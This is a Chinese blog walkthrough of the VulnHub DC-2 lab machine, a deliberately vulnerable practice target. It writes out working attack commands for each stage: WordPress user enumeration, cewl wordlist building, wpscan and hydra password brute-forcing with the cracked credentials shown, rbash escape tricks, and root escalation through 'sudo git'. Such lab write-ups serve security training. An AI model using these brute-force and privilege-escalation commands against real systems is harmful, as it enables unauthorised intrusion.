vulnhub靶机:DC-2

最新推荐文章于 2024-05-07 16:35:55 发布
最新推荐文章于 2024-05-07 16:35:55 发布
阅读量2.6k 收藏 5
点赞数 6
分类专栏: web安全 文章标签: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/108863315
版权

靶机配置说明

靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/
靶机:DC2 (VirtualBox) IP:192.168.56.111
攻击机:Kali(VMware) IP:192.168.56.108

在这里插入图片描述
在下载地址中也有详细的靶机说明,而FunBox需要寻找的flag总数为5个

靶机环境配置:

还是一样,将其桥接到同一张网卡即可。

靶机渗透开始:

kali IP:
在这里插入图片描述
第一步还是需要确定目标IP
在这里插入图片描述
确定目标ip为192.168.56.111后nmap扫描下端口,探测服务。
在这里插入图片描述
可以发现其开放了web服务和ssh服务,而ssh服务默认端口被修改成了7744。

先从80开放web服务开始入手,访问。
发现被重定向了,修改下host即可。
vim /etc/hosts
在这里插入图片描述
再次重新访问:
在这里插入图片描述
我们还是可以使用插件看到一些资产:
在这里插入图片描述

发现首页有一个Flag选项,点击
在这里插入图片描述
在flag界面拿到第一个flag,并给出提示:

大致意思:普通的字典你可能破解不了,你可能需要cewl

这已经提示我们了,可以使用cewl来生成密码字典

cewl是一款kali linux自带的爬虫工具,会自动爬取给定url,并返回一个字典

那我们先生成一个密码字典passwd.txt出来
在这里插入图片描述
生成密码字典后,我们需要知道网站用户名,刚才我们已经通过插件知道这是一个WordPress的站点,所以我们可以使用wpscan来枚举网站用户

wpscan --url dc-2 -e u

发现枚举到的网站用户有3个
在这里插入图片描述
现在我们就可以通过已知的用户和cewl生成的字典,来尝试爆破用户的密码:

vim user.txt

在这里插入图片描述
还是使用wpscan这款工具:

wpscan --url dc-2 -U user.txt -P passwd.txt

在这里插入图片描述
先尝试使用jerry用户进行登录

dc-2/wp-admin

在这里插入图片描述
如果不清楚网站结构,可以使用nikto工具探测下

nikto -h 192.168.56.111

在这里插入图片描述

接着我们使用刚才枚举到的用户进行登录

[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient

使用jerry用户登录后,成功找到第二个flag
在这里插入图片描述
而tom用户并没有发现到什么信息

第二个flag的提示:

如果你不能利用WordPress并走捷径,还有另一种方法。
希望你能找到另一个入口。

提示我们找另外一个突破点,想起我们刚才还扫到7744端口(ssh),那我们可以根据刚才枚举到的用户进行ssh爆破
这里使用hydra工具并使用刚才cewl生成的密码字典,对已知的用户名进行ssh爆破

hydra -L user.txt -P passwd.txt ssh://192.168.56.111:7744

在这里插入图片描述
成功爆破出一个密码,跟网站密码是一样

tom:parturient

直接ssh登录上去(注意端口

ssh tom@192.168.56.111 -p 7744

在这里插入图片描述
进入之后,ls发现flag3.txt
在这里插入图片描述
直接查看
在这里插入图片描述
发现被限制了。经查找,需要绕过rbash,找了下绕过,列出两种:

vi 1
:set shell =/bin/sh(设置shell)
:shell(执行完上一条再执行)
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin (设置环境变量)
在这里插入图片描述
这样命令就能使用了,但是缺点就是还不能补齐

下面这种方法可以解决补齐问题:

BASH_CMDS[a]=/bin/sh;a #调用/bin/sh命令解释器
/bin/bash #使用bash命令解释器
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin #设置环境变量

在这里插入图片描述
此时基本命令都可以使用了,也能进行补齐操作。
这里拿到了第三个flag,而flag3给的提示是:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

有个su关键字,盲猜可以使用su操作来切换到jerry用户
在这里插入图片描述
这里需要密码,可以尝试使用刚才爆出的密码进行尝试:adipiscing
在这里插入图片描述
成功登陆,并在jerry用户的home目录发现第四个flag。
flag给出的提示:

很高兴看到你已经走了这么远,但你还没回家。
你仍然需要得到最后的标志(唯一真正重要的标志!!!)。
这里没有提示-你现在只能靠自己了。😃
去吧-离开这里!!!!

看不懂啥意思,但是看到了git关键字。
查看可以使用root权限无密码的命令,发现有git命令可以使用root权限并不用输密码
这里直接提权
参考链接:https://gtfobins.github.io/gtfobins/git/

sudo git -p help config
!/bin/sh

在这里插入图片描述
成功提权到root,切换到根目录,并发现最后一个flag!
在这里插入图片描述

keepb1ue
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
【DC系列】DC-2靶机实战详细讲解
weixin_44681307的博客
06-28 391
wpscan --url http://dc-2/ --enumerate u 可以查找这个网站有什么用户名,这样我们用户名也就都有了。然后我们打开网站,在Flag看到了提醒,就是告诉我们只需要cewl扫描出来的字典就行,密码都在这里面。进去后我们发现好多命令都不能用,甚至cd都不能用,经过尝试发现vi这个命令可以用,less也可以用。cewl http://dc-2 (-d 目录深度,默认是2.-w 写到一个文件中)这时候执行这个代码,命令权限就有了,原本su命令是不能用的,现在就可以用了。
DC-2靶机
Flamingo1998的博客
02-09 220
DC-2靶机
[Vulnhub靶机] DC-1
最新发布
haosha。的博客
05-07 3988
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
DC-2靶机复现(自己渗透的记录)
hqhhhh的博客
02-20 868
环境搭建参考我的DC-1靶机搭建的方法,靶机的下载同样也在VulnHub中能找到。安装与环境的配置同样跟DC-1完全一直,只需要修改网络连接方式为NAT,使其与你的攻击机处于同一局域网内即可。
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 1378
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2703
DC-2靶机渗透测试思路及流程
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ 靶机设置 老规矩,开启虚拟机前分配一个和攻击机一样的网卡,选择我已移动该虚拟机;开启虚拟机后,netdiscover确认一下目标,我的靶机ip为192.168.190.189 靶机描述里还要配置host指向kioptrix3.com vim /etc/hosts 利用知识及工具 信息收集并getsh
Vulnhub dc-2靶机 详解 易懂
Lee_yc的博客
08-21 499
​ 下载地址:DC: 2 ~ VulnHub 下载完成后直接使用虚拟机打开就可以了,注意把靶机设置为NAT模式
DC-2靶机攻略
weixin_43179779的博客
10-16 1776
DC-2靶机攻略
靶机渗透-----DC-2
Z_Grant的博客
09-17 2781
文章目录一,工具介绍(1)cewl密码生成器(2)WPScan二,测试流程(1)主机发现(2)根据80端口的进一步测试(3)攻击准备(4)结合扫描出来的服务,尝试SSH登录 一,工具介绍 (1)cewl密码生成器 参考文章 用途 cewl是一个ruby应用,爬行指定url的指定深度。结果会返回一个单词列表,这个列进行密码爆破。 . 原理 爬取网站上的信息,遍历目录。生成一些可能的密码组合。...
DC-2靶场记录
lionwerson的博客
11-17 973
1.下载DC-2靶场: 下载地址https://download.vulnhub.com/dc/DC-2.zip2.虚拟机打开靶场改网卡模式为桥接模式,打开虚拟机。 如果要是直接访问靶机的IP的80端口是打不开的,会跳转到http://dc-2/,要修改hosts文件,然后就可以访问到了。 在hosts文件结尾添加: ip地址 dc-2 这是一个wordpress的cms,第一个flag提示我们进行登录并且用cewl生成密码列表。 cewl -w dc.txt http://d.
靶机vulnhub靶机cybox1
weixin_52450702的博客
02-28 473
vulnhub靶机cybox
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 580
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
vulnhub实战:DC-2
huangyongkang666的博客
04-25 2244
vulnhub实战:DC-2 1.DC-2介绍 描述 与DC-1非常相似,DC-2是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 与原始DC-1一样,它在设计时考虑了初学者的需求。 Linux技能和对Linux命令行的熟悉程度是必须的,基本的渗透测试工具的一些经验也是必须的。 就像DC-1一样,有五个标志,包括最后一个标志。 同样,就像DC-1一样,标志对初学者很重要,但对那些有经验的人来说并不那么重要。 简而言之,唯一真正重要的标志是最后一面旗帜。 对于初学者来说,谷歌是你的朋友。好吧
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值